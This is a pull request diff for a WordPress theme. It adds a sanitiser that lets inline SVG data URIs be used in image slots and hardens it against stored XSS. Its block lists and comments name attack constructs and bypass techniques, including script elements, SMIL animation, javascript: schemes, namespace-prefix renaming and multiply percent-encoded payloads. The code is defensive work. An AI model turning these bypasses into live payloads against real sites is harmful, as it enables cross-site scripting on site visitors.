### PR TITLE
Support data:image/* URIs (incl. inline SVG) in image slots

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,16 @@ All notable changes to PromptingPress are documented here.
 
 ---
 
+## [v0.16.14] — 2026-07-04 — Fix: Inline SVG Images No Longer Vanish From Your Page
+
+**Set an image field to an inline SVG — a `data:image/svg+xml,...` value, the kind an AI naturally produces when generating a quick icon or graphic on the fly — and it used to just disappear.** Hero backgrounds, grid images, logo strips, section images: any component with an image slot would silently render with no image at all, no error, nothing to click on. WordPress's own URL-safety function throws out `data:` URIs entirely, on the reasonable assumption that most of them aren't real image URLs — but that meant a legitimate, self-contained inline image was treated exactly like a broken link. Regular image URLs (`https://...`, uploaded media) were never affected.
+
+### Fixed
+- Every component with an image or background-image slot (hero, CTA, grid, section, stats, logo strip) now correctly displays `data:image/*` URIs, including inline SVGs, instead of rendering blank.
+
+### For contributors
+- New `pp_esc_image_src()` in `lib/wp.php` replaces `esc_url()` at every image-slot call site. For `data:image/svg+xml` payloads specifically, the SVG markup is parsed with `DOMDocument`/`DOMXPath` and validated against script execution, event handlers, external resource loading, and CSS/XML-level tricks that can quietly re-target a "safe-looking" reference to an attacker-controlled origin — a data URI can be opened as a top-level document from ordinary browser UI (e.g. "open image in new tab"), where SVG script execution is enabled, so this validation is the primary defense, not a backstop. The implementation went through five rounds of specialist and cross-model adversarial review (Claude + Codex, the latter using empirical Playwright/Chromium testing rather than static reasoning alone), each of which found and closed a genuine bypass — full history in the PR. 49 new PHPUnit tests.
+
 ## [v0.16.13] — 2026-07-04 — Fix: The CLI Command in the Docs Now Actually Works
 
 **Every doc and example told you to run `wp pp operate inspect-composition`, but that command didn't exist — WordPress registered it with an underscore (`inspect_composition`) instead of the hyphen the docs used everywhere.** A person hits that, reads the "did you mean" suggestion, and moves on in two seconds. An AI agent following the documented operating loop exactly as written can stop cold on it, or worse, quietly decide the tool doesn't support the step at all.

--- a/README.md
+++ b/README.md
@@ -13,7 +13,7 @@
 [![JavaScript](https://img.shields.io/badge/JavaScript-Vanilla-F7DF1E?style=flat-square&logo=javascript&logoColor=black)](https://developer.mozilla.org/en-US/docs/Web/JavaScript)
 [![Vitest](https://img.shields.io/badge/Vitest-Tests-6E9F18?style=flat-square&logo=vitest&logoColor=white)](https://vitest.dev)
 [![Tests](https://img.shields.io/badge/Tests-970+_passing-22C55E?style=flat-square)](tests/)
-[![Version](https://img.shields.io/badge/version-0.16.13-6366F1?style=flat-square)](CHANGELOG.md)
+[![Version](https://img.shields.io/badge/version-0.16.14-6366F1?style=flat-square)](CHANGELOG.md)
 [![License](https://img.shields.io/badge/License-GPL--2.0-blue?style=flat-square)](LICENSE)
 
 </div>

--- a/components/cta/cta.php
+++ b/components/cta/cta.php
@@ -46,7 +46,7 @@ if ($slot_style) {
     $inline_styles[] = $slot_style;
 }
 if ($background_image) {
-    $inline_styles[] = 'background-image:url(' . esc_url($background_image) . ')';
+    $inline_styles[] = 'background-image:url(' . pp_esc_image_src($background_image) . ')';
 }
 $style_attr = $inline_styles ? ' style="' . implode('; ', $inline_styles) . ';"' : '';
 

--- a/components/grid/grid.php
+++ b/components/grid/grid.php
@@ -63,7 +63,7 @@ $style_attr = $slot_style ? ' style="' . $slot_style . ';"' : '';
                         <?php if ($image_url && !$is_steps) : ?>
                             <div class="grid__item-image-wrap">
                                 <img
-                                    src="<?php echo esc_url($image_url); ?>"
+                                    src="<?php echo pp_esc_image_src($image_url); ?>"
                                     alt="<?php echo esc_attr($image_alt); ?>"
                                     class="grid__item-image"
                                     loading="lazy"

--- a/components/hero/hero.php
+++ b/components/hero/hero.php
@@ -64,7 +64,7 @@ if ($slot_style) {
     $inline_styles[] = $slot_style;
 }
 if ($variant === 'cover' && $image_url) {
-    $inline_styles[] = 'background-image:url(' . esc_url($image_url) . ')';
+    $inline_styles[] = 'background-image:url(' . pp_esc_image_src($image_url) . ')';
 }
 $style_attr = $inline_styles ? ' style="' . implode('; ', $inline_styles) . ';"' : '';
 ?>
@@ -106,7 +106,7 @@ $style_attr = $inline_styles ? ' style="' . implode('; ', $inline_styles) . ';"'
             <?php elseif ($variant === 'split' && $image_url) : ?>
                 <div class="hero__image-wrap">
                     <img
-                        src="<?php echo esc_url($image_url); ?>"
+                        src="<?php echo pp_esc_image_src($image_url); ?>"
                         alt="<?php echo esc_attr($image_alt); ?>"
                         class="hero__image"
                         loading="eager"

--- a/components/logos/logos.php
+++ b/components/logos/logos.php
@@ -39,7 +39,7 @@ $variant_class = $variant !== 'default' ? ' logos--' . $variant : '';
                     <?php if ($image_url) : ?>
                         <li class="logos__item<?php echo $label ? ' logos__item--labeled' : ''; ?>">
                             <img
-                                src="<?php echo esc_url($image_url); ?>"
+                                src="<?php echo pp_esc_image_src($image_url); ?>"
                                 alt="<?php echo esc_attr($image_alt); ?>"
                                 class="logos__image"
                                 loading="lazy"

--- a/components/section/section.php
+++ b/components/section/section.php
@@ -44,7 +44,7 @@ if ($slot_style) {
     $inline_styles[] = $slot_style;
 }
 if ($background_image) {
-    $inline_styles[] = 'background-image:url(' . esc_url($background_image) . ')';
+    $inline_styles[] = 'background-image:url(' . pp_esc_image_src($background_image) . ')';
 }
 $style_attr = $inline_styles ? ' style="' . implode('; ', $inline_styles) . ';"' : '';
 
@@ -72,7 +72,7 @@ $style_attr = $inline_styles ? ' style="' . implode('; ', $inline_styles) . ';"'
                 <?php if ($layout === 'image-left') : ?>
                     <div class="section__image-wrap">
                         <img
-                            src="<?php echo esc_url($image_url); ?>"
+                            src="<?php echo pp_esc_image_src($image_url); ?>"
                             alt="<?php echo esc_attr($image_alt); ?>"
                             class="section__image"
                             loading="lazy"
@@ -92,7 +92,7 @@ $style_attr = $inline_styles ? ' style="' . implode('; ', $inline_styles) . ';"'
                 <?php if ($layout === 'image-right') : ?>
                     <div class="section__image-wrap">
                         <img
-                            src="<?php echo esc_url($image_url); ?>"
+                            src="<?php echo pp_esc_image_src($image_url); ?>"
                             alt="<?php echo esc_attr($image_alt); ?>"
                             class="section__image"
                             loading="lazy"

--- a/components/stats/stats.php
+++ b/components/stats/stats.php
@@ -23,7 +23,7 @@ if (!in_array($variant, $allowed_variants, true)) {
 $variant_class  = $variant !== 'default' ? ' stats--' . $variant : '';
 $bg_image_class = $background_image ? ' stats--has-bg-image' : '';
 $bg_image_style = $background_image
-    ? sprintf(' style="background-image:url(%s);"', esc_url($background_image))
+    ? sprintf(' style="background-image:url(%s);"', pp_esc_image_src($background_image))
     : '';
 
 ?>

--- a/functions.php
+++ b/functions.php
@@ -7,7 +7,7 @@
  */
 
 // ── Theme version (single source of truth — keep in sync with style.css) ──
-define('PP_VERSION', '0.16.13');
+define('PP_VERSION', '0.16.14');
 
 // ── Load lib files ─────────────────────────────────────────────────────────
 require_once get_template_directory() . '/lib/wp.php';

--- a/lib/wp.php
+++ b/lib/wp.php
@@ -475,7 +475,16 @@ function pp_esc_image_src(string $url): string {
     }
 
     if (stripos($url, 'data:') !== 0) {
-        return esc_url($url);
+        // esc_url()'s allowed-character set includes '(' and ')' (it's
+        // designed for generic href="" safety, not this CSS-unquoted-url()
+        // context specifically) — an ordinary URL containing a literal ')'
+        // can still close the surrounding CSS url() token early and inject
+        // trailing declarations into the style attribute (adversarial
+        // review finding; pre-existing behavior, not introduced by this
+        // function, but this is now the one place all 6 call sites route
+        // through). Percent-encoding it is transparent to every legitimate
+        // consumer of the URL.
+        return str_replace(')', '%29', esc_url($url));
     }
 
     // Sanity bound against pathologically large inline payloads.
@@ -520,17 +529,32 @@ function pp_esc_image_src(string $url): string {
         return 'data:image/' . $mime . $charset_segment . ';base64,' . $raw_data;
     }
 
-    // Raw/percent-encoded payload. Decode to a fixed point (handles
-    // single- AND multiply-percent-encoded input identically) so the
-    // safety check runs against the same logical content the browser will
-    // eventually parse.
+    // Raw/percent-encoded payload. Decode to a TRUE fixed point (handles
+    // single- AND arbitrarily-multiply-percent-encoded input identically)
+    // so the safety check runs against the same logical content the
+    // browser will eventually parse. A capped-but-incomplete decode is not
+    // safe here: this function's own re-encoding step below only adds new
+    // %XX sequences for specific dangerous characters, it never touches a
+    // pre-existing '%' — so any encoding layer left un-decoded by the
+    // check survives into the output and gets removed by the browser's own
+    // single decode pass at render time, revealing content the check never
+    // saw (adversarial review finding: a 6-times-encoded payload survived
+    // an earlier 5-round cap this way). If genuine convergence takes more
+    // than $max_decode_rounds passes, that is itself not legitimate
+    // content — reject outright rather than proceed on a partial decode.
+    $max_decode_rounds = 20;
     $decoded = $raw_data;
-    for ($i = 0; $i < 5; $i++) {
+    $converged = false;
+    for ($i = 0; $i < $max_decode_rounds; $i++) {
         $next = rawurldecode($decoded);
         if ($next === $decoded) {
+            $converged = true;
             break;
         }
         $decoded = $next;
+    }
+    if (!$converged) {
+        return '';
     }
 
     if ($mime === 'svg+xml' && !_pp_svg_content_is_safe($decoded)) {
@@ -539,11 +563,18 @@ function pp_esc_image_src(string $url): string {
 
     // Percent-ENCODE (never strip) every character that's unsafe once
     // embedded in an HTML attribute that also contains an unquoted CSS
-    // url() token: quotes, angle brackets, parens, #, &, and all C0
-    // control/whitespace characters (\x00-\x20, which covers space, tab,
-    // newline, and CR in one pass).
+    // url() token: quotes, angle brackets, parens, #, &, backslash, and all
+    // C0 control/whitespace characters (\x00-\x20, which covers space, tab,
+    // newline, and CR in one pass). Backslash matters even though it looks
+    // inert: CSS's own url()-token tokenizer resolves "\XX" backslash
+    // escapes (independent of, and prior to, percent-decoding) while
+    // extracting the token's value — content that is completely inert to
+    // DOMDocument (e.g. a literal "\3c" is just three harmless characters
+    // to an XML parser) can decode to "<" once the browser's CSS tokenizer
+    // processes the surrounding style="...url(...)..." attribute, at the 4
+    // background-image call sites (adversarial review finding).
     $encoded = preg_replace_callback(
-        '/["\'<>()#&\x00-\x20]/',
+        '/["\'<>()#&\\\\\x00-\x20]/',
         function (array $match): string {
             return '%' . strtoupper(bin2hex($match[0]));
         },
@@ -598,11 +629,53 @@ function _pp_svg_content_is_safe(string $svg): bool {
     $xpath = new \DOMXPath($doc);
     $lower_local_name = "translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz')";
 
-    $dangerous_elements = ['script', 'foreignobject', 'iframe', 'embed', 'object'];
+    // Any processing instruction (e.g. <?xml-stylesheet href="javascript:...">
+    // before the root element) is rejected outright rather than inspected —
+    // PIs aren't attributes, so the attribute-value checks below never see
+    // one, and xml-stylesheet's href has real (if legacy/browser-specific)
+    // script/resource-loading-triggering history (adversarial review finding).
+    $pis = $xpath->query('//processing-instruction()');
+    if ($pis === false || $pis->length > 0) {
+        return false;
+    }
+
+    // SMIL animation elements (animate/animateMotion/animateTransform/
+    // animateColor/set) can retarget attributes like href/xlink:href to a
+    // javascript: value over time via their values/to/from attributes —
+    // a static per-attribute scan doesn't parse that semicolon-separated
+    // mini-language, so these elements are rejected outright. <style> is
+    // also rejected outright: unlike <script>, an SVG's own <style> element
+    // IS applied during ordinary rendering (as an <img> or CSS
+    // background-image, not just a top-level-navigation "open image in new
+    // tab") — an `@import`/`url()` inside it fires on every page view, not
+    // just for a user who takes an extra action (adversarial review finding).
+    $dangerous_elements = ['script', 'foreignobject', 'iframe', 'embed', 'object', 'animate', 'animatemotion', 'animatetransform', 'animatecolor', 'set', 'style'];
     foreach ($dangerous_elements as $name) {
         $matches = $xpath->query("//*[{$lower_local_name}='{$name}']");
         if ($matches === false || $matches->length > 0) {
             return false;
+        }
+    }
+
+    // <use>/<image> href/xlink:href are fetched during ordinary rendering
+    // too (same "fires for every visitor" reasoning as <style> above) — a
+    // tracking-pixel-style resource load, no click or top-level navigation
+    // required. Restrict to a same-document fragment (#id) or a data: URI;
+    // reject any external reference.
+    // local-name()='href' matches both the modern unprefixed `href` and the
+    // legacy `xlink:href` — an XML namespace prefix doesn't change the
+    // local name, only the namespace it resolves to.
+    $ref_elements = ['use', 'image'];
+    foreach ($ref_elements as $name) {
+        $refs = $xpath->query("//*[{$lower_local_name}='{$name}']/@*[{$lower_local_name}='href']");
+        if ($refs === false) {
+            return false;
+        }
+        foreach ($refs as $ref) {
+            $value = trim((string) $ref->nodeValue);
+            if ($value !== '' && $value[0] !== '#' && stripos($value, 'data:') !== 0) {
+                return false;
+            }
         }
     }
 
@@ -612,14 +685,26 @@ function _pp_svg_content_is_safe(string $svg): bool {
         return false;
     }
 
-    // javascript: URIs in any attribute value (href, xlink:href, etc.) —
-    // already-entity-resolved by the parser, so no separate decoding needed.
+    // Dangerous URI schemes in any attribute value (href, xlink:href, etc.)
+    // — already-entity-resolved by the parser, so no separate decoding
+    // needed. Tab/newline/CR are stripped before the prefix check because
+    // browser URL parsing strips them from anywhere in a URL string (a
+    // well-known normalization step, not unique to this codebase) —
+    // "java&#x0A;script:" resolves to "javascript:" at navigation time even
+    // though the DOM attribute value still has the embedded newline
+    // (adversarial review finding). data:text/html (or any non-image data:
+    // scheme) is rejected alongside javascript: — a nested <a href> inside
+    // an already-opened SVG is a real, if lower-likelihood, escalation path.
     $all_attrs = $xpath->query('//@*');
     if ($all_attrs === false) {
         return false;
     }
     foreach ($all_attrs as $attr) {
-        if (preg_match('/^\s*javascript:/i', (string) $attr->nodeValue)) {
+        $normalized = preg_replace('/[\t\n\r]/', '', (string) $attr->nodeValue);
+        if (preg_match('/^\s*javascript:/i', $normalized)) {
+            return false;
+        }
+        if (preg_match('/^\s*data:(?!image\/)/i', $normalized)) {
             return false;
         }
     }

--- a/lib/wp.php
+++ b/lib/wp.php
@@ -431,16 +431,40 @@ function pp_render_style_vars(array $style, string $component_name): string {
  * identical to every call site's prior behavior.
  *
  * For data: URIs, this only accepts image/{png,jpeg,jpg,gif,webp,svg+xml} —
- * never data:text/html or other schemes/types that could be misused outside
- * an image-rendering context. Base64 payloads are structurally validated
- * (their alphabet is inert in HTML-attribute and CSS-url() contexts, so no
- * further encoding is needed). Raw/percent-encoded SVG payloads are checked
- * for script-executing constructs as defense in depth — modern browsers
- * already disable script execution for SVGs rendered as an image (via
- * <img src> or CSS background-image; this is NOT true for <iframe>/<object>,
- * which this function's callers never use) — then percent-encoded for the
- * handful of characters that are unsafe once embedded in an HTML attribute
- * that also contains an unquoted CSS url() token (", ', (, ), #, &, whitespace).
+ * never data:text/html or other schemes/types.
+ *
+ * SECURITY NOTE (do not weaken without re-reading this): a browser does NOT
+ * treat SVGs rendered as an image (via <img src> or CSS background-image) as
+ * script-executing — but every <img> call site here gives an ordinary user a
+ * standard browser feature ("Open image in new tab", copy-image-address,
+ * drag-to-new-tab) that navigates to the data: URI as a TOP-LEVEL document,
+ * where SVG script execution IS enabled. So the SVG content validation
+ * below is the PRIMARY defense against stored XSS via an AI-chat-and-human-editable
+ * image_url/background_image prop, not defense in depth on top of the
+ * browser (adversarial review finding — an earlier version of this
+ * docblock got that backwards). Getting the check-then-encode ordering
+ * exactly right matters:
+ *  - The safety check always runs against the FULLY, repeatedly
+ *    percent-decoded payload (not the raw input) — otherwise an
+ *    already-percent-encoded payload (single- or multiply-encoded) sails
+ *    past a literal-substring blocklist and only becomes dangerous once the
+ *    browser decodes it (cross-model review finding).
+ *  - The final re-encoding step only ever REPLACES a character with its
+ *    percent-encoding — it never DELETES one. Deleting a character can
+ *    silently merge two adjacent, previously-separated fragments back into
+ *    a blocked keyword (e.g. "&lt;scr" + [deleted newline] + "ipt&gt;"
+ *    becomes "&lt;script&gt;") — the exact bypass a cross-model review
+ *    caught in an earlier version of this function.
+ *  - SVG content is validated by actually parsing it as XML (DOMDocument +
+ *    DOMXPath) and checking resolved element/attribute local names — a
+ *    literal-substring blocklist is defeated by XML namespace-prefix
+ *    renaming (e.g. "<x:script>" with an xmlns:x bound to the SVG
+ *    namespace) and by character references reconstructing a blocked
+ *    string at parse time; a real parser resolves both correctly by
+ *    construction. See _pp_svg_content_is_safe().
+ *  - Base64 payloads are decoded and parsed with the exact same check —
+ *    "the alphabet is inert" only protects the HTML/CSS transport, not the
+ *    SVG document it decodes to.
  *
  * @param string $url  Candidate image source (http(s) URL, relative path, or data: URI).
  * @return string  Safe-to-echo value, or '' if the input is empty or rejected.
@@ -455,54 +479,152 @@ function pp_esc_image_src(string $url): string {
     }
 
     // Sanity bound against pathologically large inline payloads.
-    if (strlen($url) > 1000000) {
+    $max_data_uri_length = 1_000_000;
+    if (strlen($url) > $max_data_uri_length) {
         return '';
     }
 
-    if (!preg_match('/^data:image\/(png|jpe?g|gif|webp|svg\+xml)(;charset=[a-z0-9_-]+)?(;base64)?,(.*)$/is', $url, $m)) {
+    if (!preg_match('/^data:image\/(png|jpe?g|gif|webp|svg\+xml)(;charset=([a-z0-9_-]+))?(;base64)?,(.*)$/isD', $url, $m)) {
         return '';
     }
 
     $mime      = strtolower($m[1]);
-    $charset   = $m[2];
-    $is_base64 = $m[3] !== '';
-    $payload   = $m[4];
+    $charset   = $m[3];
+    $is_base64 = $m[4] !== '';
+    $raw_data  = $m[5];
+
+    // Only utf-8 (or unspecified, which defaults to utf-8 for text-ish
+    // media types) is allowed. Other charsets — utf-7 above all — are a
+    // known vector for a downstream parser to reconstruct blocked byte
+    // sequences that a byte-level blocklist never sees (cross-model finding).
+    if ($charset !== '' && strtolower($charset) !== 'utf-8') {
+        return '';
+    }
+    $charset_segment = $charset !== '' ? ';charset=utf-8' : '';
 
     if ($is_base64) {
-        // Base64 alphabet is inert in both contexts — validate, don't re-encode.
-        if ($payload === '' || !preg_match('/^[A-Za-z0-9+\/]+={0,2}$/', $payload)) {
+        // 'D' anchors $ to the true string end (without it, PCRE also
+        // matches just before a single trailing "\n", which would let an
+        // unescaped newline slip into an unquoted CSS url() token below).
+        if ($raw_data === '' || !preg_match('/^[A-Za-z0-9+\/]+={0,2}$/D', $raw_data)) {
             return '';
         }
-        return 'data:image/' . $mime . $charset . ';base64,' . $payload;
+        if ($mime === 'svg+xml') {
+            $decoded = base64_decode($raw_data, true);
+            if ($decoded === false || !_pp_svg_content_is_safe($decoded)) {
+                return '';
+            }
+        }
+        // Base64 alphabet is inert in both HTML-attribute and CSS-url()
+        // contexts — the string is returned exactly as validated.
+        return 'data:image/' . $mime . $charset_segment . ';base64,' . $raw_data;
     }
 
-    $lower = strtolower($payload);
-    $forbidden = ['<script', 'javascript:', '<foreignobject', '<iframe', '<embed', '<object'];
-    foreach ($forbidden as $bad) {
-        if (strpos($lower, $bad) !== false) {
-            return '';
+    // Raw/percent-encoded payload. Decode to a fixed point (handles
+    // single- AND multiply-percent-encoded input identically) so the
+    // safety check runs against the same logical content the browser will
+    // eventually parse.
+    $decoded = $raw_data;
+    for ($i = 0; $i < 5; $i++) {
+        $next = rawurldecode($decoded);
+        if ($next === $decoded) {
+            break;
         }
+        $decoded = $next;
     }
-    if (preg_match('/\son\w+\s*=/i', $payload)) {
+
+    if ($mime === 'svg+xml' && !_pp_svg_content_is_safe($decoded)) {
         return '';
     }
 
-    $encoded = strtr($payload, [
-        '"'  => '%22',
-        "'"  => '%27',
-        '<'  => '%3C',
-        '>'  => '%3E',
-        '('  => '%28',
-        ')'  => '%29',
-        '#'  => '%23',
-        '&'  => '%26',
-        ' '  => '%20',
-        "\t" => '%20',
-        "\n" => '',
-        "\r" => '',
-    ]);
+    // Percent-ENCODE (never strip) every character that's unsafe once
+    // embedded in an HTML attribute that also contains an unquoted CSS
+    // url() token: quotes, angle brackets, parens, #, &, and all C0
+    // control/whitespace characters (\x00-\x20, which covers space, tab,
+    // newline, and CR in one pass).
+    $encoded = preg_replace_callback(
+        '/["\'<>()#&\x00-\x20]/',
+        function (array $match): string {
+            return '%' . strtoupper(bin2hex($match[0]));
+        },
+        $decoded
+    );
 
-    return 'data:image/' . $mime . $charset . ',' . $encoded;
+    return 'data:image/' . $mime . $charset_segment . ',' . $encoded;
+}
+
+/**
+ * True if decoded SVG markup contains no script-executing constructs.
+ * See the security note on pp_esc_image_src() — this is the primary
+ * defense, not defense in depth, because a data: URI is reachable as a
+ * top-level navigation (e.g. "Open image in new tab") regardless of how
+ * it's embedded in the page.
+ *
+ * Parses with DOMDocument/DOMXPath rather than string/regex matching. A
+ * regex blocklist on raw text is defeated by XML namespace prefix renaming
+ * — e.g. `<x:script>` with `xmlns:x="http://www.w3.org/2000/svg"` declared
+ * elsewhere in the document is exactly equivalent to `<script>` per XML
+ * namespace rules, but a literal "<script" substring search never sees it
+ * (cross-model review finding). XPath's local-name() resolves the TRUE
+ * element/attribute name regardless of prefix, closing that class of
+ * bypass by construction instead of by an ever-growing list of special
+ * cases. A real parser also resolves standard XML character references
+ * (e.g. "&#x61;" -> "a") as a normal part of parsing, so by the time an
+ * attribute value is inspected here it's already the same string a
+ * rendering engine would see — no separate entity-obfuscation check needed.
+ *
+ * DOCTYPE is rejected outright (not "parsed carefully") — this closes the
+ * entire external-entity/DTD attack surface without depending on getting a
+ * specific combination of libxml flags exactly right.
+ */
+function _pp_svg_content_is_safe(string $svg): bool {
+    if (stripos($svg, '<!doctype') !== false) {
+        return false;
+    }
+
+    $prev_setting = libxml_use_internal_errors(true);
+    $doc = new \DOMDocument();
+    // No LIBXML_DTDLOAD/LIBXML_DTDATTR — never fetch or apply an external
+    // DTD (moot anyway since DOCTYPE is rejected above, but belt and
+    // suspenders). LIBXML_NONET blocks any network access during parsing.
+    $parsed = $doc->loadXML($svg, LIBXML_NONET);
+    libxml_clear_errors();
+    libxml_use_internal_errors($prev_setting);
+
+    if (!$parsed) {
+        return false;
+    }
+
+    $xpath = new \DOMXPath($doc);
+    $lower_local_name = "translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz')";
+
+    $dangerous_elements = ['script', 'foreignobject', 'iframe', 'embed', 'object'];
+    foreach ($dangerous_elements as $name) {
+        $matches = $xpath->query("//*[{$lower_local_name}='{$name}']");
+        if ($matches === false || $matches->length > 0) {
+            return false;
+        }
+    }
+
+    // Event-handler attributes (onload, onclick, ...), any element/namespace.
+    $on_attrs = $xpath->query("//@*[starts-with({$lower_local_name}, 'on')]");
+    if ($on_attrs === false || $on_attrs->length > 0) {
+        return false;
+    }
+
+    // javascript: URIs in any attribute value (href, xlink:href, etc.) —
+    // already-entity-resolved by the parser, so no separate decoding needed.
+    $all_attrs = $xpath->query('//@*');
+    if ($all_attrs === false) {
+        return false;
+    }
+    foreach ($all_attrs as $attr) {
+        if (preg_match('/^\s*javascript:/i', (string) $attr->nodeValue)) {
+            return false;
+        }
+    }
+
+    return true;
 }
 
 /**

--- a/lib/wp.php
+++ b/lib/wp.php
@@ -657,14 +657,69 @@ function _pp_svg_content_is_safe(string $svg): bool {
         }
     }
 
+    // Event-handler attributes (onload, onclick, ...), any element/namespace.
+    $on_attrs = $xpath->query("//@*[starts-with({$lower_local_name}, 'on')]");
+    if ($on_attrs === false || $on_attrs->length > 0) {
+        return false;
+    }
+
+    $all_attrs = $xpath->query('//@*');
+    if ($all_attrs === false) {
+        return false;
+    }
+    foreach ($all_attrs as $attr) {
+        $value = (string) $attr->nodeValue;
+
+        // SVG has many presentation attributes/CSS properties that reference
+        // another resource via a CSS-style url(...) wrapper — fill, stroke,
+        // filter, mask, clip-path, marker-start/mid/end, and cursor (usually
+        // via a style="..." attribute) among them. All of these are applied
+        // during ORDINARY rendering (fetched for every visitor, not gated
+        // behind a click or top-level navigation) — confirmed empirically
+        // against a real browser (adversarial review: style="filter:url(...)",
+        // filter="url(...)", fill="url(...)", and style="cursor:url(...)"
+        // all triggered real network requests to an external host when
+        // rendered). Rather than enumerate every attribute name that can
+        // carry a url() reference (an open-ended, easy-to-miss list), every
+        // attribute value is scanned generically for the url(...) pattern
+        // and any reference that isn't a same-document fragment or a
+        // data: URI is rejected.
+        if (preg_match_all('/url\(\s*[\'"]?([^\'")]*)[\'"]?\s*\)/i', $value, $url_matches)) {
+            foreach ($url_matches[1] as $ref) {
+                $ref = trim($ref);
+                if ($ref !== '' && $ref[0] !== '#' && stripos($ref, 'data:') !== 0) {
+                    return false;
+                }
+            }
+        }
+
+        // Dangerous URI schemes in any attribute value (href, xlink:href,
+        // etc.) — already-entity-resolved by the parser, so no separate
+        // decoding needed. Tab/newline/CR are stripped before the prefix
+        // check because browser URL parsing strips them from anywhere in a
+        // URL string (a well-known normalization step, not unique to this
+        // codebase) — "java&#x0A;script:" resolves to "javascript:" at
+        // navigation time even though the DOM attribute value still has the
+        // embedded newline (adversarial review finding). data:text/html (or
+        // any non-image data: scheme) is rejected alongside javascript: — a
+        // nested <a href> inside an already-opened SVG is a real, if
+        // lower-likelihood, escalation path.
+        $normalized = preg_replace('/[\t\n\r]/', '', $value);
+        if (preg_match('/^\s*javascript:/i', $normalized)) {
+            return false;
+        }
+        if (preg_match('/^\s*data:(?!image\/)/i', $normalized)) {
+            return false;
+        }
+    }
+
     // <use>/<image> href/xlink:href are fetched during ordinary rendering
-    // too (same "fires for every visitor" reasoning as <style> above) — a
-    // tracking-pixel-style resource load, no click or top-level navigation
-    // required. Restrict to a same-document fragment (#id) or a data: URI;
-    // reject any external reference.
-    // local-name()='href' matches both the modern unprefixed `href` and the
-    // legacy `xlink:href` — an XML namespace prefix doesn't change the
-    // local name, only the namespace it resolves to.
+    // too (same "fires for every visitor" reasoning above) — restrict to a
+    // same-document fragment (#id) or a data: URI (already validated as
+    // image-only above); reject any external reference. local-name()='href'
+    // matches both the modern unprefixed `href` and the legacy `xlink:href`
+    // — an XML namespace prefix doesn't change the local name, only the
+    // namespace it resolves to.
     $ref_elements = ['use', 'image'];
     foreach ($ref_elements as $name) {
         $refs = $xpath->query("//*[{$lower_local_name}='{$name}']/@*[{$lower_local_name}='href']");
@@ -676,36 +731,6 @@ function _pp_svg_content_is_safe(string $svg): bool {
             if ($value !== '' && $value[0] !== '#' && stripos($value, 'data:') !== 0) {
                 return false;
             }
-        }
-    }
-
-    // Event-handler attributes (onload, onclick, ...), any element/namespace.
-    $on_attrs = $xpath->query("//@*[starts-with({$lower_local_name}, 'on')]");
-    if ($on_attrs === false || $on_attrs->length > 0) {
-        return false;
-    }
-
-    // Dangerous URI schemes in any attribute value (href, xlink:href, etc.)
-    // — already-entity-resolved by the parser, so no separate decoding
-    // needed. Tab/newline/CR are stripped before the prefix check because
-    // browser URL parsing strips them from anywhere in a URL string (a
-    // well-known normalization step, not unique to this codebase) —
-    // "java&#x0A;script:" resolves to "javascript:" at navigation time even
-    // though the DOM attribute value still has the embedded newline
-    // (adversarial review finding). data:text/html (or any non-image data:
-    // scheme) is rejected alongside javascript: — a nested <a href> inside
-    // an already-opened SVG is a real, if lower-likelihood, escalation path.
-    $all_attrs = $xpath->query('//@*');
-    if ($all_attrs === false) {
-        return false;
-    }
-    foreach ($all_attrs as $attr) {
-        $normalized = preg_replace('/[\t\n\r]/', '', (string) $attr->nodeValue);
-        if (preg_match('/^\s*javascript:/i', $normalized)) {
-            return false;
-        }
-        if (preg_match('/^\s*data:(?!image\/)/i', $normalized)) {
-            return false;
         }
     }
 

--- a/lib/wp.php
+++ b/lib/wp.php
@@ -466,11 +466,21 @@ function pp_render_style_vars(array $style, string $component_name): string {
  *    "the alphabet is inert" only protects the HTML/CSS transport, not the
  *    SVG document it decodes to.
  *
- * @param string $url  Candidate image source (http(s) URL, relative path, or data: URI).
+ * @param string $url    Candidate image source (http(s) URL, relative path, or data: URI).
+ * @param int    $depth  Internal recursion guard — a nested data: URI found
+ *                        inside an SVG's own href/xlink:href is validated by
+ *                        calling this function again (see
+ *                        _pp_svg_content_is_safe()); this bounds how deeply
+ *                        data URIs can nest inside each other before being
+ *                        rejected outright. Callers never need to pass this.
  * @return string  Safe-to-echo value, or '' if the input is empty or rejected.
  */
-function pp_esc_image_src(string $url): string {
+function pp_esc_image_src(string $url, int $depth = 0): string {
     if ($url === '') {
+        return '';
+    }
+
+    if ($depth > 3) {
         return '';
     }
 
@@ -520,7 +530,7 @@ function pp_esc_image_src(string $url): string {
         }
         if ($mime === 'svg+xml') {
             $decoded = base64_decode($raw_data, true);
-            if ($decoded === false || !_pp_svg_content_is_safe($decoded)) {
+            if ($decoded === false || !_pp_svg_content_is_safe($decoded, $depth)) {
                 return '';
             }
         }
@@ -557,24 +567,29 @@ function pp_esc_image_src(string $url): string {
         return '';
     }
 
-    if ($mime === 'svg+xml' && !_pp_svg_content_is_safe($decoded)) {
+    if ($mime === 'svg+xml' && !_pp_svg_content_is_safe($decoded, $depth)) {
         return '';
     }
 
     // Percent-ENCODE (never strip) every character that's unsafe once
     // embedded in an HTML attribute that also contains an unquoted CSS
-    // url() token: quotes, angle brackets, parens, #, &, backslash, and all
-    // C0 control/whitespace characters (\x00-\x20, which covers space, tab,
-    // newline, and CR in one pass). Backslash matters even though it looks
-    // inert: CSS's own url()-token tokenizer resolves "\XX" backslash
-    // escapes (independent of, and prior to, percent-decoding) while
-    // extracting the token's value — content that is completely inert to
-    // DOMDocument (e.g. a literal "\3c" is just three harmless characters
-    // to an XML parser) can decode to "<" once the browser's CSS tokenizer
-    // processes the surrounding style="...url(...)..." attribute, at the 4
-    // background-image call sites (adversarial review finding).
+    // url() token: quotes, angle brackets, parens, #, &, backslash, DEL
+    // (\x7F), and all C0 control/whitespace characters (\x00-\x20, which
+    // covers space, tab, newline, and CR in one pass). Backslash matters
+    // even though it looks inert: CSS's own url()-token tokenizer resolves
+    // "\XX" backslash escapes (independent of, and prior to,
+    // percent-decoding) while extracting the token's value — content that
+    // is completely inert to DOMDocument (e.g. a literal "\3c" is just
+    // three harmless characters to an XML parser) can decode to "<" once
+    // the browser's CSS tokenizer processes the surrounding
+    // style="...url(...)..." attribute, at the 4 background-image call
+    // sites (adversarial review finding). DEL is also non-printable per
